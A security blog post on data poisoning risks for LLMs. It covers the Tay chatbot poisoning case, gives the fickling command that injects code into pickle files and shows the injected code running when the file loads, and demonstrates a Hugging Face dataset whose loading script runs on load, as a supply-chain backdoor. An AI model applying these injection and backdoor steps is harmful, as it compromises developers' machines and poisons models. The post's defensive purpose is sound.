Be wary about risks from Data in LLM Workflow

Why we need to pay attention to Data

Over the past few decades, various procedural and object-oriented codes, as well as components built on programming languages, have been core components of the software supply chain.

But since the emergence of AlphaGo, CNN deep neural networks, and the huge changes brought by LLM (large language models) to various industries, the code oriented paradigm has gradually undergone a transformation.

In the new paradigm, data has become an unquestionable core component. Currently, data is not only used for training LLM, but also becomes a core foundational component in application scenarios such as Rag Agent and GenAI Agent. In more flexible GenAI scenarios, data is even directly interpreted and executed by LLM as so-called “natural language code”.

We believe that with the increasing popularity of LLM, data may become a new attack surface for APT organizations or hackers in the near future.

What are the attack surfaces targeting Data

Let’s first define the so-called Data here：

Data refers to text, images, videos, and sounds that exist in the form of byte streams, mainly used in model training and inference processes.

Next, let’s define the LLM risk referred to here：

LLM risk refers to the unexpected behavior of LLM beyond the initial program behavior set by developers, or the generation of inappropriate content that violates human social values, which the content generally refers to vary digital media, such as text, images, videos, and audio.

In this article, we focus on three aspects of data risks：

Poisoning of training data
Local cache file (such as pickle. etc.) poisoning
Open source data warehouse (such as hugeface. etc.) poisoning

Poisoning of training data

The most typical example of training data poisoning is AVID-2022-V013.

Microsoft created Tay, a Twitter chatbot designed to engage and entertain users. While previous chatbots used pre-programmed scripts to respond to prompts, Tay’s machine learning capabilities allowed it to be directly influenced by its conversations.

Tay bot used the interactions with its Twitter users as training data to improve its conversations. Adversaries were able to coordinate with the intent of defacing Tay bot by exploiting this feedback loop.

A coordinated attack encouraged malicious users to tweet abusive and offensive language at Tay, which eventually led to Tay generating similarly inflammatory content towards other users.

Microsoft decommissioned Tay within 24 hours of its launch and issued a public apology with lessons learned from the bot’s failure.

Local cache file (such as pickle. etc.) poisoning

Understanding Python Pickling with example

In Python, we sometimes need to save the object on the disk for later use. This can be done by using Python pickle.

Python pickle module is used for serializing and de-serializing a Python object structure. Any object in Python can be pickled so that it can be saved on disk. What Pickle does is it “serializes” the object first before writing it to a file. Pickling is a way to convert a Python object (list, dictionary, etc.) into a character stream. The idea is that this character stream contains all the information necessary to reconstruct the object in another Python script. It provides a facility to convert any Python object to a byte stream. This Byte stream contains all essential information about the object so that it can be reconstructed, or “unpickled” and get back into its original form in any Python.

In the below example, we will use a pickle file to first write the data in it using the pickle.dump() function. Then using the pickle.load() function, we will load the pickle fine in Python script and print its data in the form of a Python dictionary.

# Python3 program to illustrate store
# efficiently using pickle module
# Module translates an in-memory Python object
# into a serialized byte stream—a string of
# bytes that can be written to any file-like object.

import pickle


def storeData():
    # initializing data to be stored in db
    Omkar = {'key': 'Omkar', 'name': 'Omkar Pathak',
             'age': 21, 'pay': 40000}
    Jagdish = {'key': 'Jagdish', 'name': 'Jagdish Pathak',
               'age': 50, 'pay': 50000}

    # database
    db = {}
    db['Omkar'] = Omkar
    db['Jagdish'] = Jagdish

    # Its important to use binary mode
    dbfile = open('examplePickle', 'ab')

    # source, destination
    pickle.dump(db, dbfile)
    dbfile.close()


def loadData():
    # for reading also binary mode is important
    dbfile = open('examplePickle.pkl', 'rb')
    db = pickle.load(dbfile)
    for keys in db:
        print(keys, '=>', db[keys])
    dbfile.close()


if __name__ == '__main__':
    storeData()
    loadData()

The pickle module is not secure

Python pickle files are compiled programs running in a VM called the Pickle Machine (PM). Opcodes control the flow. Turns out there are opcodes that can learn to running arbitrary code, namely GLOBAL and REDUCE.

The dangers are also highlighted in pickle documentation page：

Injecting backdoor code into pickle file

Trail of bits has a tool named fickling that allows to inject code and also check pickle files to see if they have been backdoored.

python3.9 -m pip install fickling

As you can see using –inject can inject python commands to the pickle file.

python3.9 -m fickling --inject 'print("You have been pwned!!")' ./examplePickle.pkl > ./examplePickle.backdoor.pkl

Now, the question was if that pickle file gets loaded, will the command execute?

import pickle

def loadData():
    # for reading also binary mode is important
    dbfile = open('examplePickle.backdoor.pkl', 'rb')
    db = pickle.load(dbfile)
    for keys in db:
        print(keys, '=>', db[keys])
    dbfile.close()


if __name__ == '__main__':
    loadData()

This indeed worked. The command was executed!

Also, it did not impact the functionality of the program.

Is this risk serious?

When thinking of the implications of this exploit, I think that even within a Google Colab project this is a big problem. Projects are isolated, but many users have their Google Drive mapped into the Colab project. This means that an attack who tricks someone to opening a malicious pickle file could gain access to the drive contents.

Of course, this can occur inside other tools and MLOps pipelines, compromising systems and data.

The risks of Google Colab exploits discussed in this post as well Careful Who You Colab With by 4n7m4n.

GPUs are harder to find and are more expensive lately. Google Colab is free, and Colab Pro is cheap. This is one reason ML researchers are now turning to cloud platforms like Colab. Researchers also enjoy collaborating and sharing their work with others, much as developers in the open source community do. For these reasons and others, we are seeing a growth in the number of cloud collaboration ML frameworks users. Most of these users are not, however, security experts. This puts users at higher risk while using these platforms.

How to prevent?

Carefully scan serialized files from others.
Develop a Code scanning plugin for Colab.

Be Careful Who You Colab With. Don’t automatically trust everyone you meet in the ML community. Remember, phishing is easy.

Open source data warehouse (such as hugeface. etc.) poisoning

About Hugging Face

As the “GitHub of AI” and the most influential AI open source community in the world, Hugging Face provides a large number of high-quality open source models, datasets, and AI application hosting services, greatly reducing the technical threshold of AI. The organization’s open source components such as transformers and datasets are also widely used in the AI field.

The datasets component provides developers with an efficient and easy-to-use way to process various datasets, making it easier to train and fine tune AI models. It has over 18.8k stars on Github and is currently the most popular open-source AI dataset component. As of July 2024, the Hugging Face platform has hosted 180,403 public datasets for developers to use, and developers can directly load all public datasets on the platform using datasets.

Unsafe features of Dataset components

Developers usually use the load_dataset function of the datasets component to load datasets. In order to support more complex data processing formats or processes, when the loaded dataset contains a Python script with the same name as the dataset, the script will be run by default.

The document is show below.

Due to the fact that all datasets on the Hugging Face platform are uploaded by users, if the Python scripts in the dataset contain malicious behavior, it can pose a serious security risk.

For demonstration purposes, I created a hugeface dataset and created a dataset loading scripts (.py code) with the same name as the dataset in the root directory.

Then upload some sample data,

import pandas as pd
from datasets import Dataset, DatasetDict
from huggingface_hub import HfApi, HfFolder, Repository
import os

# delete it, if no need
os.environ['HTTP_PROXY'] = 'http://127.0.0.1:1087'
os.environ['HTTPS_PROXY'] = 'http://127.0.0.1:1087'

data = {
    "sentence": ["Hello world!", "I love machine learning.", "Datasets are great.", "Hugging Face is awesome!"],
    "label": [0, 1, 1, 0]
}

df = pd.DataFrame(data)

train_df = df.sample(frac=0.8, random_state=1)
test_df = df.drop(train_df.index)

train_dataset = Dataset.from_pandas(train_df)
test_dataset = Dataset.from_pandas(test_df)

dataset_dict = DatasetDict({"train": train_dataset, "test": test_dataset})

dataset_dict.save_to_disk("example_dataset")

dataset_id = "zhenghan/hf_dataset_backdoor"

api = HfApi()

repo_url = api.create_repo(repo_id=dataset_id, repo_type="dataset", exist_ok=True)

repo = Repository(local_dir="example_dataset", clone_from=repo_url)
repo.git_add()
repo.git_commit("Initial commit")
repo.git_push()

Then, when the user attempts to load this dataset, the loading scripts code in the dataset will automatically run.

from datasets import load_dataset

dataset = load_dataset('zhenghan/hf_dataset_backdoor')

train_dataset = dataset['train']
test_dataset = dataset['test']

print("Train Dataset:", train_dataset)
print("Test Dataset:", test_dataset)

for data in train_dataset[:5]:
    print(data)

Before 1.13.3, datasets allowed loading scripts to be run for pre-processing when loading datasets.

As a fundamental library in the field of AI, datasets has a large download volume. According to the pypistats website, the download volume in the past day was nearly 400000. Once malicious datasets are widely spread and used on the internet, a large number of developers will suffer from supply chain backdoor poisoning attacks.

By utilizing this feature, attackers can distribute datasets containing malicious backdoor code through Hugging Face, GitHub, and other channels. When developers load the malicious dataset through the datasets component for training or fine-tuning, the malicious backdoor code in the dataset will run, causing AI models, datasets, and code to be stolen or maliciously tampered with.

At the same time, attackers can use LLM develop supply chains and continue injecting logical backdoor datasets into the dataset. When these datasets containing logical backdoors enter the LLM training and fine-tuning data pipeline, the resulting domain LLM or even GenAI App may have backdoor risks.

Manufacturer’s mitigation measures

It should be noted that the Hugging Face has disabled dataset loading scripts since version 1.13.3. Specifically, they introduced a change that requires users to use a new packaging feature instead of relying on old scripting methods to load and process data.

This is a design decision made by the Hugging Face team to improve the maintainability and consistency of the library. If you are using an older version of the Dataset library and rely on these scripts, you may need to update your code to adapt to the new version and loading method.

If you are still planning a new project, it is recommended to directly use newer versions (such as 1.14.0 and later) and refer to the corresponding official documentation and tutorials to learn how to use the new packaging feature to process datasets.

On October 20, 2023, Hugging Face confirmed and fixed a vulnerability, and rated it as severe (CVSS score 9.6). The official platform issued further security risk warnings for all potentially risky datasets.

So, this vulnerability is currently not exploitable.

Security Recommendations

Developers or teams using datasets server as a server component are advised to update to a version that includes the following commit (c8f45f858ca71c2e66782c672c672bfbbaa8d965eab02) in a timely manner.

For the vast community of developers or teams using the datasets component, please ensure that the dataset source is trustworthy, check for malicious Python code in the dataset script, and use datasets that are flagged as security risks on Hugging Face with caution.

In addition to Hugging Face, other external sources (such as GitHub) and even local datasets also require AI and LLM developers to be highly vigilant.

Reference

Share the Post: